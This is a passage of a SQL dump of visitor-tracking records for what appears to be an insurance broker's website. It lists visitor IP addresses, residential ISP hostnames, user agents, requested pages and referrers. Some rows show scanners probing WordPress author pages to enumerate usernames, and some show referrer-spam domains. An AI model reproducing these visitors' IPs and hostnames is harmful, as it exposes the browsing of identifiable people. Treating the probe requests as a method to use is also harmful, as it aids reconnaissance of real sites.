11','us','','Yahoo!','','','','','0','0',0),(25248,'0b_0a033f26cc402a4613103afdfe322dde','1462480606','108.21.214.226','pool-108-21-214-226.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25250,'0b_0a033f26cc402a4613103afdfe322dde','1462481344','108.21.214.226','pool-108-21-214-226.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://r.search.yahoo.com/_ylt=A0LEV2DLritXJyMAdAtXNyoA;_ylu=X3oDMTByOHZyb21tBGNvbG8DYmYxBHBvcwMxBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1462509388/RO=10/RU=http%3a%2f%2fwww.empireins.com%2f/RK=0/RS=CplVK2wL4dtauk9WuI9hYZCKmhM-','_ylt=A0LEV2DLritXJyMAdAtXNyoA;_ylu=X3oDMTByOHZyb21tBGNvbG8DYmYxBHBvcwMxBHZ0aWQDBHNlYwNzcg--',1,'Win7 x64','IE 11','us','1344 x 840','Yahoo!','','','','','0','0',0),(25251,'0b_0a033f26cc402a4613103afdfe322dde','1462481346','108.21.214.226','pool-108-21-214-226.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1344 x 840','','','','','','0','0',0),(25254,'0b_0a033f26cc402a4613103afdfe322dde','1462481377','108.21.214.226','pool-108-21-214-226.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1344 x 840','','','','','','0','51',0),(25256,'0b_0a033f26cc402a4613103afdfe322dde','1462481378','108.21.214.226','pool-108-21-214-226.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1344 x 840','','','','','','0','0',0),(25257,'0b_0a033f26cc402a4613103afdfe322dde','1462481392','108.21.214.226','pool-108-21-214-226.nycmny.fios.verizon.net','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1344 x 840','','','','','','0','51',0),(25260,'0b_aceb1e7c0e8173f1ba1e57e2b23cec44','1462482065','66.69.23.197','cpe-66-69-23-197.satx.res.rr.com','/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Chrome 50','us','','Google','','','','','0','0',0),(25263,'0b_cf1f88144312c361173df214fec16a21','1462482494','107.21.1.8','ec2-107-21-1-8.compute-1.amazonaws.com','/','Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)','http://www.empireins.com/','',0,'','','us','','','','','','','0','0',0),(25266,'0b_c706b6e0193fbb91a1bdf6a75b817011','1462483104','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(25268,'0b_8ae76572010bbddfac420ced91ea9a0e','1462484122','207.46.13.105','msnbot-207-46-13-105.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25271,'0b_49a058a27244a4503cd837e751edc483','1462484124','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(25274,'0b_49a058a27244a4503cd837e751edc483','1462484125','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(25277,'0b_a034a881d3e6802671e1daa3a33138c9','1462484905','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25280,'0b_a034a881d3e6802671e1daa3a33138c9','1462484906','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25283,'0b_2b5f327fd6b4a328c19bd394ac866fee','1462485127','146.185.239.11','146.185.239.11','/?author=1','Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060716 Firefox/1.5.0.4','','',0,'Linux','Firefox 1','us','','','','','','','0','0',0),(25286,'0b_2b5f327fd6b4a328c19bd394ac866fee','1462485137','146.185.239.11','146.185.239.11','/author/admin/','Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.4) Gecko/20060716 Firefox/1.5.0.4','','',0,'Linux','Firefox 1','us','','','','','','','0','0',0),(25289,'0b_6fb21a8f1a298b3623591d588cacc762','1462486379','38.96.134.234','38.96.134.234','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 50','us','','Google','','','','','0','0',0),(25290,'0b_6fb21a8f1a298b3623591d588cacc762','1462486391','38.96.134.234','38.96.134.234','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(25292,'0b_d318bd3cb28cee4c931f8eca400f0641','1462486624','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25293,'0b_d318bd3cb28cee4c931f8eca400f0641','1462486626','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25296,'0b_0869b9c42a13b617e91b2a36315c94e8','1462487775','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(25298,'0b_0869b9c42a13b617e91b2a36315c94e8','1462487776','141.8.143.235','spider-141-8-143-235.yandex.com','/calc.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(25299,'0b_d6ff67c2e3db584322a00584984a383e','1462488088','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(25301,'0b_14a071064da57e4f47ca5eeb94e7b165','1462488129','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25302,'0b_14a071064da57e4f47ca5eeb94e7b165','1462488131','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25305,'0b_d3655658866561b0b0f9de58725f920e','1462488440','100.43.81.152','spider-100-43-81-152.yandex.com','/contact/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(25307,'0b_2c1462bb2d8a3abb29a571b1f0aaa683','1462488650','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)','http://ifirestarter.ru/','',0,'WinXP','IE 6','','','','','','','','0','0',0),(25308,'0b_683a7453d20a5ee69cd2cde9edaa6220','1462488650','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; TheFreeDictionary.com; .NET CLR 1.1.4322; .NET CLR 1.0.3705; .NET CLR 2.0.50727)','http://carsnumber.com/','',0,'WinXP','IE 6','','','','','','','','0','0',0),(25311,'0b_b0adbce2556181640795a9711a596ead','1462492004','188.143.232.22','188.143.232.22','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','0','0',0),(25313,'0b_b0adbce2556181640795a9711a596ead','1462492015','188.143.232.22','188.143.232.22','/agent-tools/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)','','',0,'WinXP','IE 6','','','','','','','','0','0',0),(25316,'0b_c236399c5772c28e67e79de54a448fd0','1462494409','66.249.64.160','crawl-66-249-64-160.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25317,'0b_4fca0f1e93bf3fd50d6250173c2a8fe3','1462494634','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(25320,'0b_31085c439ffaeb7e96f5001a6de5f4ae','1462495283','66.249.64.154','crawl-66-249-64-154.googlebot.com','/meet-the-eib-team/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(25322,'0b_31085c439ffaeb7e96f5001a6de5f4ae','1462495571','66.249.64.154','crawl-66-249-64-154.googlebot.com','/meet-the-eib-team/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(25325,'0b_901a4c56a885657087913e4836d160d6','1462495799','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/top-ten-points-to-consider-when-coming-up-with-a/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25326,'0b_866154dbc26c532e804d6b06c1cadeb9','1462496848','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(25329,'0b_7d24bde83aa440f3f71c978788e50728','1462497083','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0','http://coinsruss.com/','',0,'WinXP','Opera 9','ua','','','','','','','0','0',0),(25331,'0b_7d24bde83aa440f3f71c978788e50728','1462497083','46.118.116.239','sol-fttb.239.116.118.46.sovam.net.ua','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 9.0','http://coinsruss.com/','',0,'WinXP','Opera 9','ua','','','','','','','0','0',0),(25332,'0b_33f7f5cc76322162abd82824a58075b5','1462497389','207.182.140.211','d3.8c.b6.static.xlhost.com','/','Mozilla/5.0 (Windows NT 6.1; Win64; x64) KomodiaBot/1.0','','',0,'Win7 x64','','','','','','','','','0','0',0),(25334,'0b_e2f1b6fdd61de99efa7a1ce3e9ae1505','1462497454','207.182.140.210','d2.8c.b6.static.xlhost.com','/','M','','',0,'','','','','','','','','','0','0',0),(25337,'0b_44213bb65bb0778ca644ddca4278b821','1462500307','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25338,'0b_15b13f850894832eec2cb1f1b26db402','1462501885','207.46.13.127','msnbot-207-46-13-127.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25340,'0b_635b678e98d092517dc0edd85d6a274f','1462502569','131.253.25.248','msnbot-131-253-25-248.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b','http://www.empireins.com/','',0,'Win7','BingPreview 1','','','','BingBot','','','','0','0',0),(25343,'0b_3e8de523f338f6938840eb04004d7ff1','1462502803','208.115.111.66','208-115-111-66-reverse.wowrack.com','/carriers/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(25344,'0b_3cec0f91a344cd53a263bad503671236','1462504685','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(25346,'0b_04f8840113256e5157f32a8690e48e04','1462506944','66.132.132.87','server1.richloom.com','/?author=0','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(25347,'0b_04f8840113256e5157f32a8690e48e04','1462506945','66.132.132.87','server1.richloom.com','/?author=1','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(25349,'0b_523d96f7a5b53a208f142c6daeed07cb','1462510182','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(25352,'0b_35028d4260af8c58c5156b21aa320c1b','1462514632','5.39.85.81','crawl05.lp.007ac9.net','/robots.txt','','','',0,'','','','','','Unknown Spider','','','','0','0',0),(25355,'0b_5d1a07074dbb918f66192c033056a496','1462514634','5.39.85.81','crawl05.lp.007ac9.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24','','',0,'Linux','Chrome 11','','','','Unknown Spider','','','','0','0',0),(25356,'0b_64df30deb2e097893e2f5071597bd0e6','1462514822','66.249.64.154','crawl-66-249-64-154.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25359,'0b_e51c64d1d1efde186a7c8c41891765e8','1462516822','66.249.64.166','crawl-66-249-64-166.googlebot.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25361,'0b_28a79ae92199e0acc640d6f7005c8fb7','1462519676','66.249.64.160','crawl-66-249-64-160.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(25362,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525478','104.131.215.64','104.131.215.64','/robots.txt','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','','',0,'','','us','','','spbot','','','','3','0',0),(25365,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525489','104.131.215.64','104.131.215.64','/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','','',0,'','','us','','','spbot','','','','3','0',0),(25368,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525501','104.131.215.64','104.131.215.64','/igo/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(25371,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525514','104.131.215.64','104.131.215.64','/forms/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(25374,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525525','104.131.215.64','104.131.215.64','/contact/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(25376,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525536','104.131.215.64','104.131.215.64','/about-us/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(25379,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525547','104.131.215.64','104.131.215.64','/carriers/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(25382,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525557','104.131.215.64','104.131.215.64','/register/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(25385,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525568','104.131.215.64','104.131.215.64','/insentives/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(25386,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525579','104.131.215.64','104.131.215.64','/?page_id=169','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/forms/','',0,'','','us','','','spbot','','','','3','0',0),(25388,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525589','104.131.215.64','104.131.215.64','/agent-tools/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(25389,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525600','104.131.215.64','104.131.215.64','/case-status/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(25391,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525611','104.131.215.64','104.131.215.64','/term-quotes/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(25394,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525622','104.131.215.64','104.131.215.64','/licensing-contracting/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(25397,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525635','104.131.215.64','104.131.215.64','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/forms/','',0,'','','us','','','spbot','','','','3','0',0),(25398,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525645','104.131.215.64','104.131.215.64','/members/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'','','us','','','spbot','','','','3','0',0),(25401,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525656','104.131.215.64','104.131.215.64','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/about-us/','',0,'','','us','','','spbot','','','','3','0',0),(25403,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525667','104.131.215.64','104.131.215.64','/meet-the-eib-team/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/about-us/meet-the-eib-team/','',0,'','','us','','','spbot','','','','3','0',0),(25404,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525678','104.131.215.64','104.131.215.64','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(25406,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525688','104.131.215.64','104.131.215.64','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(25407,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525699','104.131.215.64','104.131.215.64','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(25409,'0b_7d2f13d393c1057c9302d288e80c2f6e','1462525710','104.131.215.64','104.131.215.64','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(25410,'0b_8336458115fde7d3093859ff94561ce9','1462526113','178.162.211.222','178.162.211.222','/robots.txt','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0','','',0,'Win8 x64','Firefox 39','','','','Unknown Spider','','','','0','0',0),(25413,'0b_b8e76e282179cbc464013e552fcb6efe','1462526299','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(25415,'0b_b8e76e282179cbc464013e552fcb6efe','1462526303','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/about-us','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(25416,'0b_b8e76e282179cbc464013e552fcb6efe','1462526323','207.46.13.34','msnbot-207-46-13-34.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(25419,'0b_6f9da0e46d92c3dc14526a287a8fd92b','1462529503','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(25422,'0b_ef4796f4f2b01949a7936c44d97e33bb','1462532739','66.249.64.166','crawl-66-249-64-166.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(25424,'0b_95ce181cf760d57019b3984c5fcf71b0','1462537285','14.169.154.85','static.vnpt.vn','/?author=1','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0','','',0,'Win8 x64','Firefox 28','vn','','','','','','','0','0',0),(25425,'0b_95ce181cf760d57019b3984c5fcf71b0','1462537286','14.169.154.85','static.vnpt.vn','/author/admin/','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0','','',0,'Win8 x64','Firefox 28','vn','','','','','','','0','0',0),(25427,'0b_95ce181cf760d57019b3984c5fcf71b0','1462537292','14.169.154.85','static.vnpt.vn','/?author=2','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0','','',0,'Win8 x64','Firefox 28','vn','','','','','','','0','0',0),(25430,'0b_2c9e9c6673325bbaa4df6a7997c1a12d','1462537421','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(25433,'0b_a76cab0380f7de0d6734435846199187','1462537903','92.236.71.145','cpc94094-newt38-2-0-cust912.19-3.cable.virginm.net','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(25434,'0b_a76cab0380f7de0d6734435846199187','1462537905','92.236.71.145','cpc94094-newt38-2-0-cust912.19-3.cable.virginm.net','/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(25437,'0b_f1b0d274f145249064534b34db62c51c','1462539533','54.165.94.55','ec2-54-165-94-55.compute-1.amazonaws.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31','','',0,'Win7','','','','','Internet','','','','0','0',0),(25439,'0b_f984a5bda58c4a3c5966d5aa40102ef5','1462540394','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(25440,'0b_b3ade028493a0a2398f1230ae7467968','1462540395','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25443,'0b_f984a5bda58c4a3c5966d5aa40102ef5','1462540397','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(25446,'0b_b3ade028493a0a2398f1230ae7467968','1462540397','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(25448,'0b_ef01dd2fc79231fe1e72735cb0a14da8','1462542029','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(25449,'0b_ef01dd2fc79231fe1e72735cb0a14da8','1462542074','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(25452,'0b_dc01232be738677c641b834fa911ff60','1462544285','158.69.241.154','ns526074.ip-158-69-241.net','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(25455,'0b_dc01232be738677c641b834fa911ff60','1462544287','158.69.241.154','ns526074.ip-158-69-241.net','/SSO/235_14.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','us','','','MJ12bot','','','','0','0',0),(25457,'0b_dc01232be738677c641b834fa911ff60','1462544288','158.69.241.154','ns526074.ip-158-69-241.net','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; 